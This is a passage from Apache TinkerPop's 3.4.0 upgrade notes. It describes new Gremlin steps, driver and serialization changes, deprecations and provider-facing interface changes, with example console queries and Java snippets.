release.\n\n=== Upgrading for Users\n\n==== sparql-gremlin\n\nThe `sparql-gremlin` module is a link:https:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin compiler, which allows\nSPARQL to be executed over any TinkerPop-enabled graph system.\n\n[source,groovy]\n----\ngraph = TinkerFactory.createModern()\ng = graph.traversal(SparqlTraversalSource)\ng.sparql(\"\"\"SELECT ?name ?age\n WHERE { ?person v:name ?name . ?person v:age ?age }\n ORDER BY ASC(?age)\"\"\")\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1878[TINKERPOP-1878],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#sparql-gremlin[Reference Documentation]\n\n==== Gremlin.NET Driver Improvements\n\nThe Gremlin.NET driver now uses request pipelining. This allows connections to be reused for different requests in\nparallel which should lead to better utilization of connections. The `ConnectionPool` now also has a fixed size\nwhereas it could previously create an unlimited number of connections. Each `Connection` can handle up to\n`MaxInProcessPerConnection` requests in parallel. If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects, `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removes properties and only\ninclude the `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. Both, the new `TextP` text\npredicates and the old `P` predicates, can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation, this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language agnostic, network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could place return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:link:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior version of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly use graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== `min()` `max()` and Comparable\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? [yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n==== Deprecation and Removal\n\nThis section describes newly deprecated classes, methods, components and patterns of usage as well as which previously\ndeprecated features have been officially removed or repurposed.\n\n===== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n===== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n===== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n===== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n===== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n===== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n===== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored becaue it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1518[TINKERPOP-1518]\n\n===== Configuring Interface\n\nThere were some changes to interfaces that were related to `Step`. A new `Configuring` interface was added that was\nhelpful in the implementation of the `with()`-step modulator. This new interface extends the `Parameterizing` interface\n(which moved to the `org.apache.tinkerpop.gremlin.process.traversal.step` package with the other step interfaces) and\nin turn is extended by the `Mutating` interface. Making this change meant that the `Mutating.addPropertyMutations()`\nmethod could be removed in favor of the new `Configuring.configure()` method.\n\nAll of the changes above basically mean, that if the `Mutating` interface was being used in prior versions, the\n`addPropertyMutations()` method simply needs to be changed to `configure()`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975]\n\n===== OptionsStrategy\n\n`OptionsStrategy` is a `TraversalStrategy` that makes it possible for users to set arbitrary configurations on a\n`Traversal`. These configurations can be used by graph providers to allow for traversal-level configurations to be\naccessible to their custom steps. A user would write something like:\n\n[source,java]\n----\ng.withStrategies(OptionsStrategy.build().with(\"specialLimit\", 10000).create()).V();\n----\n\nThe `OptionsStrategy` is really only the carrier for the configurations and while users can choose to utilize that\nmore verbose method for constructing it shown above, it is more elegantly constructed as follows using `with()`-step:\n\n[source,java]\n----\ng.with(\"specialLimit\", 10000)).V();\n----\n\nThe graph provider could then access that value of \"specialLimit\" in their custom step (or elsewhere) as follows:\n\n[source,java]\n----\nOptionsStrategy strategy = this.getTraversal().asAdmin().getStrategies().getStrategy(OptionsStrategy.class).get();\nint specialLimit = (int) strategy.getOptions().get(\"specialLimit\");\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2053[TINKERPOP-2053]\n\n===== Removed hadoop-gremlin Test Artifact\n\nThe `hadoop-gremlin` module no longer generates a test jar 